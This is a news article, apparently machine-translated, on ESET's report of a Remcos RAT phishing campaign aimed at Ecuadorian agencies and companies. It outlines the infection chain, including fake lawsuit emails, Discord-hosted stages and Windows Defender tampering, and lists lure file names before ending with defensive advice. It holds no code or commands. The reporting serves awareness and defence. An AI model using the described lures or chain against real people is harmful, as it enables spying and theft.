At the end of June and beginning of August, the so-called Operation Red Octopus took place, a campaign of malware which registered activity in several Latin American countries, but with marked repercussions in Ecuador and targeting government agencies, organizations in the health sector and private companies from different industries in the country.
The malware attempting to distribute the campaign was the well-known Remcos Remote Access Trojan (RAT), according to cybersecurity company ESET Latin America. Although Remcos is a software It was developed to remotely monitor and manage devices, and for a few years now it has also been used by cybercriminals in different malicious campaigns that seek to spy on and steal information from their victims’ computers.
Ecuador is among the five Latin American countries in whose companies the most malicious computer detections are registered
The way to infect the victims was through phishing. For example, there were emails that appeared to be from the Ecuadorian State Attorney General’s Office (FGE), alleged legal proceedings, lawsuits or even bank transfers. The FGE emails claimed that the user had a “pending” lawsuit and was asked to download the infected file.
These emails include a link that leads to the download of a compressed file that is password protected. If the victim opens this file, which appears to be in Word format, it triggers the infection process, which consists of two stages that end up downloading the Remcos RAT to the victim’s computer.
In a first stage, the malicious file seeks to execute a second malicious code that downloads a malicious file hosted on Discord and that will modify Windows Defender settings to evade detection. In addition, it downloads a compressed file, which is also hosted on Discord and which contains a malicious executable developed in .NET, which is responsible for achieving persistence and running Remcos.
This Trojan allows different actions to be carried out on the compromised computer through commands that are executed remotely by the attackers, for example:
- take screenshots
- Log keystrokes by the user (keylogging)
- Record audio
- manipulate files
- Remotely run commands on a machine
- run remotely scripts in a machine
A stolen Instagram account sells for up to $15 on the black market in Ecuador; a Fortnite profile over $40
The name of the downloaded attachment may vary. Some examples of the names used in this campaign can be:
- ADMINISTRATIVE DEMAND CRIMINAL TRIAL.rar
- BANK TRANSFER ATTACHED PROOF.rar
- CRIMINAL PROCESS TRIAL DEMAND FILED (1).rar
- TRIAL NO. 2586522 COURT 2 JUDICIAL CALL.exe
- PROSECUTOR CRIMINAL PROCESS TRIAL DEMAND FILED (2).rar
- TRANSFER VOUCHER MADE TO YOUR COMPANY CURRENT ACCOUNT (1).rar
- CRIMINAL PROCESS COMMUNICATION OF TRIAL DEMAND FILED.rar
- ADMINISTRATIVE BUSINESS JUDICIAL PROCESS CALLED 1 ATTORNEY GENERAL.rar
To avoid being a victim of a campaign of malware like this, the first thing is to learn to recognize possible emails from phishing, notes ESET. For this, it is important to pay attention to the sender’s email address and avoid downloading or executing attached files or links if there is the slightest doubt or suspicion that it may not be a legitimate email. (YO)
Source: Eluniverso
Paul is a talented author and journalist with a passion for entertainment and general news. He currently works as a writer at the 247 News Agency, where he has established herself as a respected voice in the industry.
